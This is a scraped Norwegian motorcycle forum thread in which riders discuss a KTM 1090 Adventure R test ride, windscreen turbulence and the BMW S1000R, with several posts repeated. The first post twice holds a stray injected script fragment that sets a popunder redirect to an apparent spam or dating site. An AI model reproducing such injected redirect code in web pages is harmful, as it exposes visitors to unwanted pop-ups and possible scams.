xyvind's logg [ADVENTURE]
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Her er prøvekjøringen av 2018 KTM 1090 Adventure R.
Jeg la min elsk på denne sykkelen fordi den så rå ut, og var like rå å kjøre. Det eneste som plagde meg var turbulensen fra vindskjermen Den høres godt i videoen.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Jeg la min elsk på denne sykkelen fordi den så rå ut, og var like rå å kjøre. Det eneste som plagde meg var turbulensen fra vindskjermen Den høres godt i videoen.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
- AJ
- Administrator
- Innlegg: 38204
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Det med vindskjermen er selve akilleshælen på så og si alle adventuresyklene vi har.
Det finnes løsninger, men i stedet for å leite som høynåla i en høysåta etter disse så anbefaler jeg heller å senke toleranseterskelen noe i tillegg til å bruke gode ørepropper.
Og nyte kjøreturen uten å la skjermproblemene overskygge kjøregleden.
Jeg er heller ikke 100 % fornøyd med min SA-S, men sørger altså for best mulig støybeskyttelse mot fartsvinden, som er det jeg plages mest med.
Det som dukker opp av turbulens takler jeg fint. Og i de tilfellene, som ofte forekommer, hvor det er riktig så behagelig bak vindskjermen pga. av vindretning og vindforhold, nytes i fulle drag!
Det finnes løsninger, men i stedet for å leite som høynåla i en høysåta etter disse så anbefaler jeg heller å senke toleranseterskelen noe i tillegg til å bruke gode ørepropper.
Og nyte kjøreturen uten å la skjermproblemene overskygge kjøregleden.
Jeg er heller ikke 100 % fornøyd med min SA-S, men sørger altså for best mulig støybeskyttelse mot fartsvinden, som er det jeg plages mest med.
Det som dukker opp av turbulens takler jeg fint. Og i de tilfellene, som ofte forekommer, hvor det er riktig så behagelig bak vindskjermen pga. av vindretning og vindforhold, nytes i fulle drag!
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Godt skrevet!AJ skrev: ↑05 mai 2018, 23:47 Det med vindskjermen er selve akilleshælen på så og si alle adventuresyklene vi har.
Det finnes løsninger, men i stedet for å leite som høynåla i en høysåta etter disse så anbefaler jeg heller å senke toleranseterskelen noe i tillegg til å bruke gode ørepropper.
Og nyte kjøreturen uten å la skjermproblemene overskygge kjøregleden.
Jeg er heller ikke 100 % fornøyd med min SA-S, men sørger altså for best mulig støybeskyttelse mot fartsvinden, som er det jeg plages mest med.
Det som dukker opp av turbulens takler jeg fint. Og i de tilfellene, som ofte forekommer, hvor det er riktig så behagelig bak vindskjermen pga. av vindretning og vindforhold, nytes i fulle drag!
Tror jeg skal prøve å få til en prøvekjøring til hos en forhandler, der jeg har litt bedre tid, for å se om jeg skal fortsette å drømme om det her
-
OnlineBjerknez
- Innlegg: 23390
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Kjøper du en slik, er det jaggu ikke sikker jeg kommer!
-
OnlineBjerknez
- Innlegg: 23390
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Såså... ikke ta helt av nå
-
OnlineBjerknez
- Innlegg: 23390
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Takk for kaffe og hyggelig prat i dag :)
- Stian87
- Innlegg: 2038
- Registrert: 14 mai 2016, 23:18
- Motorsykkelen din: Ducati Diavel 2016
- Sted: Ski
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Ikke du også!
LocaToWeb Profilside
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Takk for besøket! Neste gang må vi kombinere kaffe og prat med en liten kjøreturBjerknez skrev:Takk for kaffe og hyggelig prat i dag :)
-
OnlineBjerknez
- Innlegg: 23390
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Det fikser vi enkelt.
Ta deg en tur til meg, så fikser vi merkene på sykkelen din, før vi tar en kjøretur til Høk for en kaffe. Får vondt inni meg når jeg ser ripene og merkene i sykkelen din.
-
OnlineBjerknez
- Innlegg: 23390
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
- Stian87
- Innlegg: 2038
- Registrert: 14 mai 2016, 23:18
- Motorsykkelen din: Ducati Diavel 2016
- Sted: Ski
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Hehe overrasker meg ikke, de fleste syklers kjøreegenskaper vil ikke kunne måle seg med S1000R. KTM er flinke, du kan vanskelig gå feil med en sykkel fra dem
LocaToWeb Profilside
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
- Stian87
- Innlegg: 2038
- Registrert: 14 mai 2016, 23:18
- Motorsykkelen din: Ducati Diavel 2016
- Sted: Ski
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Høres ut som han har vansker for å kvitte seg med S1000R gitt. Det skjønner jeg godt
LocaToWeb Profilside
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
https://locatoweb.com/user/ztian
Ducati Monster 821 2016 (2016 - 2017) --> BMW S1000R 2017 (2017 - 2019) --> Ducati Diavel 2016 (2019--->)
- AJ
- Administrator
- Innlegg: 38204
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: xyvind's logg [BMW S1000R - Sesongstart 2018!]
Gutten ender nok opp med en KTM 1090 om ikke altfor lenge, skal dere se .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering